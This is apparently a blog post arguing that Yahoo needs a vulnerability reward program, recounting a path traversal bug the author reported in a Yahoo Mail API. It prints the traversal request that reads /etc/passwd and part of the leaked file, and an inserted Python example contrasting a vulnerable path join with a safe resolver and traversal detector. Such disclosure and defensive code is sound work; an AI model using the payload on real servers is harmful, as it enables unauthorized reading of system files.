Yahoo, please start with a Vulnerability Reward Program

Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking — Reuters Tech (@ReutersTech) May 17, 2013


This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, PayPal, Etsy, etc. (list of reward programs @bugcrowd).

Last year I discovered an LFI/Path Traversal vulnerability in a REST API used by Yahoo Mail and got an automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.

GET /v2/xframe/../../../../../../../etc/passwd?bc  

HTTP/1.1 200 OK  
Connection: close  
Expires: Thu, 15 Apr 2020 20:00:00 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 29676

root:*:0:0:Charlie &:/root:/usr/local/bin/bash  
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh  
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin  
operator:*:2:5:System &:/:/sbin/nologin  
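As an added illustration (not code from this post or from Yahoo), the snippet below puts the naive path join that produces the kind of traversal shown above next to a resolver that normalises the requested path and rejects anything that leaves the document root. The document root, the route prefix and the log lines are assumptions constructed for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed layout for the example; not Yahoo's real document root or routing.
DOC_ROOT = "/srv/app/xframe"
ROUTE_PREFIX = "/v2/xframe/"   # route seen in the request line above


def vulnerable_resolve(doc_root: str, requested: str) -> str:
    """Naive join: the URL path is appended verbatim, so a run of '../'
    segments climbs out of doc_root and the OS happily opens /etc/passwd."""
    return posixpath.normpath(doc_root + "/" + requested)


def safe_resolve(doc_root: str, requested: str) -> Optional[str]:
    """Decode, normalise, then check the result is still inside doc_root.
    Returns None (reject with 400/404) when the request escapes the root."""
    decoded = unquote(requested)          # handles %2e%2e style encoding
    if "\x00" in decoded:                 # NUL bytes truncate C-level paths
        return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def request_path(request_line: str) -> str:
    """Pull the file path out of an HTTP request line, dropping the query
    string ('?bc' above) and the route prefix. Raises on other routes."""
    _method, target, *_rest = request_line.split()
    path = target.split("?", 1)[0]
    if not path.startswith(ROUTE_PREFIX):
        raise ValueError("not an xframe request: " + target)
    return path[len(ROUTE_PREFIX):]


def flag_traversal(request_lines):
    """Detection helper for access-log review: return the request lines whose
    resolved target would leave the document root."""
    return [ln for ln in request_lines
            if safe_resolve(DOC_ROOT, request_path(ln)) is None]


# Constructed sample request lines for the example.
SAMPLE_LOG = [
    "GET /v2/xframe/../../../../../../../etc/passwd?bc",
    "GET /v2/xframe/widgets/frame.html HTTP/1.1",
    "GET /v2/xframe/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
]
```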

Some minutes later I got an automated reply from Yahoo Security Contact (security at


Thank you for contacting Yahoo!. These issues have been passed along to the correct teams to investigate. Should a fix be required, we will again contact you and ask that you see the issues as resolved.

Thanks again, Yahoo! Security Contact

Days later the issue was fixed. But no more replies from them!

Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.

